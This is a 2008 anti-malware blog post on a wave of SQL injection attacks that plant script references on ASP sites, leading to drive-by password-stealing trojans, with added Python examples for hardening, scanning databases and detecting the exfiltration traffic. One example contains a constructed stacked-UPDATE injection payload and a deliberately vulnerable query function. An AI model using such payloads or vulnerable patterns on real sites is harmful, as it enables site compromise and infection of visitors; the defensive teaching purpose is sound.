Latest Wave of SQL Injection Attacks
May 8th, 2008
Since April, almost every week has had its own wave of SQL injection attacks that compromise legitimate websites to direct their visitors to malicious code. Like the earlier waves, this latest one also tries to infect visitors of legitimate websites with a password-stealing trojan.
The attackers continue to use SQL injection against ASP and ASP.NET websites that do not sufficiently validate user input. Some useful links for IIS web server administrators are
Upon successful infection, the legitimate site contains an injected SCRIPT reference pointing to the malicious server hosted in Beijing, China. The SCRIPT references are injected mainly into the TITLE elements of websites, but not exclusively there. Many websites have also been hit two or more times, leaving two SCRIPT references that overwrite each other.
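As an added illustration (not code from the original post), the following Python snippet shows the two halves of the problem described above: a request parameter pasted straight into SQL text, next to the hardened form that validates and binds it, plus a small scanner a site administrator can run over the content database to find injected SCRIPT references and count how many times a row was hit. SQLite stands in for the site's database; the table, rows, the placeholder host name and the payload are all constructed for this example, and executescript() models a driver that runs stacked statements the way classic ADO does.

```python
import re
import sqlite3


def make_db():
    """Constructed sample content table standing in for a site's back-end DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT, "
        "hits INTEGER DEFAULT 0)"
    )
    conn.executemany(
        "INSERT INTO pages (title, body) VALUES (?, ?)",
        [("Home", "Welcome"), ("Contact", "Mail us")],
    )
    conn.commit()
    return conn


def count_hit_vulnerable(conn, page_id):
    """Classic ASP pattern: the request parameter is concatenated into the SQL.
    executescript() stands in for a driver that executes stacked statements,
    so anything the caller appends after a ';' runs as well."""
    sql = "UPDATE pages SET hits = hits + 1 WHERE id = " + page_id
    conn.executescript(sql)


def count_hit_safe(conn, page_id):
    """Hardened form: check the type first, then bind the value as a parameter
    so the database never parses it as SQL. Returns the number of rows updated."""
    try:
        pid = int(page_id)
    except ValueError:
        return 0  # reject the request (a real handler would answer HTTP 400)
    cur = conn.execute("UPDATE pages SET hits = hits + 1 WHERE id = ?", (pid,))
    conn.commit()
    return cur.rowcount


# An external script include: "<script ... src=" in any casing.
SCRIPT_REF = re.compile(r"<script\b[^>]*\bsrc\s*=", re.IGNORECASE)


def find_injected_script_refs(conn, table="pages"):
    """Scan every TEXT column of a table for external SCRIPT references.
    Returns (row id, column, reference count) per affected cell; a count
    above 1 means the row was hit more than once. `table` is an internal
    name chosen by the administrator, never user input."""
    cols = [
        row[1]
        for row in conn.execute(f"PRAGMA table_info({table})")
        if row[2].upper() == "TEXT"
    ]
    found = []
    for col in cols:
        for rid, value in conn.execute(f"SELECT id, {col} FROM {table}"):
            n = len(SCRIPT_REF.findall(value or ""))
            if n:
                found.append((rid, col, n))
    return found


if __name__ == "__main__":
    # Constructed payload in the shape the post describes: a stacked UPDATE that
    # appends a SCRIPT reference to every title. The host is a placeholder.
    payload = (
        "1; UPDATE pages SET title = title || "
        "'<script src=\"http://example.invalid/x.js\"></script>'"
    )
    conn = make_db()
    count_hit_vulnerable(conn, payload)
    print(find_injected_script_refs(conn))  # every title now carries one reference
    clean = make_db()
    print(count_hit_safe(clean, payload), find_injected_script_refs(clean))  # 0 []
```

Running the same payload through count_hit_safe() updates nothing, because the parameter is rejected before it reaches the database; the scanner is the check to run after the fact, and a reference count of two or more in one cell corresponds to the repeatedly hit sites mentioned above.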

The infection seems to continue steadily: according to a Google query for infected sites run a couple of days ago, the number of infections grew from 6,000 to 8,500 within just 12 hours. This steady growth is probably due to the use of an attack toolkit rather than a worm component.

The malicious website performs drive-by infection via at least an MDAC exploit (MS06-014), which comes in two differently obfuscated scripts, and exploits for two RealPlayer vulnerabilities. Neither is a zero-day vulnerability, so staying up to date with patches already helps a lot.
Upon successful drive-by infection, a downloader and backdoor malware is installed on the victim’s PC. Names of infected PCs are also reported back to the attacker’s server. The downloader then downloads a second-stage malware executable as instructed by the attacker.
As of this writing, this second-stage malware is a Trojan Dropper that installs a Password-Stealing spyware. The dropper unpacks two (UPX-packed) libraries from its resources and registers them with the victim’s system. Injecting its code into Internet Explorer, it tries to steal user credentials for the World of Warcraft online game, but also for popular web mail sites.

Data is transmitted back to a server hosted in Beijing, China. Network administrators can check log files for outgoing HTTP POST requests that fit this scheme:
POST … HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; …; SV1; MyIE2)
Host: …
Content-Length: …
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDACQADRDT=AMCJBFJAKJAPMNIKCDENGIIB
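To turn the POST scheme quoted above into something that can be run over proxy or gateway logs, here is an added Python example (not part of the original post). It parses raw HTTP requests, checks each of the header indicators from the pattern, and only flags a request when enough of them coincide, since Accept-Language zh-cn or a MyIE2 User-Agent on their own are common in legitimate traffic. The three sample requests are constructed for this example; the host address, path, cookie value and the Windows version string in the User-Agent are placeholders, not values from the post.

```python
import re

# Header indicators taken from the quoted POST pattern. Each is weak alone,
# so they are counted together and a request is flagged above a threshold.
INDICATORS = {
    "user-agent-myie2": lambda h: "MyIE2" in h.get("user-agent", ""),
    "user-agent-msie6": lambda h: "MSIE 6.0" in h.get("user-agent", ""),
    "accept-language-zh-cn": lambda h: h.get("accept-language", "").lower() == "zh-cn",
    "form-urlencoded": lambda h: h.get("content-type", "")
    .lower()
    .startswith("application/x-www-form-urlencoded"),
    "cache-control-no-cache": lambda h: h.get("cache-control", "").lower() == "no-cache",
    "asp-session-cookie": lambda h: bool(
        re.match(r"ASPSESSIONID[A-Z]+=", h.get("cookie", ""))
    ),
}


def parse_request(raw):
    """Split a raw HTTP request (request line plus headers) into
    (method, target, headers); header names are lower-cased for lookup."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(maxsplit=2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # end of the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def score_request(raw):
    """Return (score, matched indicator names). Only POSTs are scored."""
    method, _target, headers = parse_request(raw)
    if method.upper() != "POST":
        return 0, []
    hits = [name for name, check in INDICATORS.items() if check(headers)]
    return len(hits), hits


def scan_log(requests, threshold=5):
    """Return (host, score, matched indicators) for every request that matches
    at least `threshold` of the indicators."""
    flagged = []
    for raw in requests:
        score, hits = score_request(raw)
        if score >= threshold:
            _, _, headers = parse_request(raw)
            flagged.append((headers.get("host", "?"), score, hits))
    return flagged


# Constructed sample traffic: one request shaped like the quoted scheme, one
# legitimate Chinese-language form post, one GET. Addresses and values are placeholders.
SAMPLE_REQUESTS = [
    "POST /constructed/path.asp HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: zh-cn\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2)\r\n"
    "Host: 203.0.113.5\r\n"
    "Content-Length: 64\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "Cookie: ASPSESSIONIDCONSTRUCT=ABCDEFGHIJKLMNOPQRSTUVWX\r\n",
    "POST /login HTTP/1.1\r\n"
    "Accept-Language: zh-cn\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) "
    "Gecko/20080404 Firefox/2.0.0.14\r\n"
    "Host: mail.example.com\r\n",
    "GET / HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: MyIE2\r\n",
]

if __name__ == "__main__":
    for host, score, hits in scan_log(SAMPLE_REQUESTS):
        print(f"flagged POST to {host}: {score} indicators {hits}")
```

With the default threshold the first sample is flagged on all six indicators, the Firefox form post scores only two, and the GET is never scored. The threshold is the tuning knob: lowering it catches variants that change one header but raises false positives from ordinary Chinese-language browsing.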
The exploits used for initial drive-by infection are proactively blocked by the Secure Anti-Malware Engine as “Script.Rce.Gen” and “Script.Agent.ES”, respectively. The first-stage downloader is blocked proactively as “Trojan.Crypt.NSPM.Gen”, and the second-stage dropper and spyware are proactively detected as “Trojan.Dropper.Gen”.
Home users are urged to keep their Windows systems patched and their anti-virus software up to date. Also keep an eye on the third-party software installed on your system - music and video players, PDF readers, and so on. These need to be kept up to date, too.
Both the MDAC and RealPlayer vulnerabilities currently used in this attack are located in ActiveX controls, so using a web browser like Firefox that doesn’t support ActiveX can help further. Yet the days when “simply” staying on known, legitimate websites and not surfing to “shady” sites counted as a basic computer hygiene rule seem to be over. Be careful when a “Save As” dialog box pops up, even on a legitimate website, asking where to save some executable; it is better to cancel right away and leave that site.
Author: Anti-Malware Team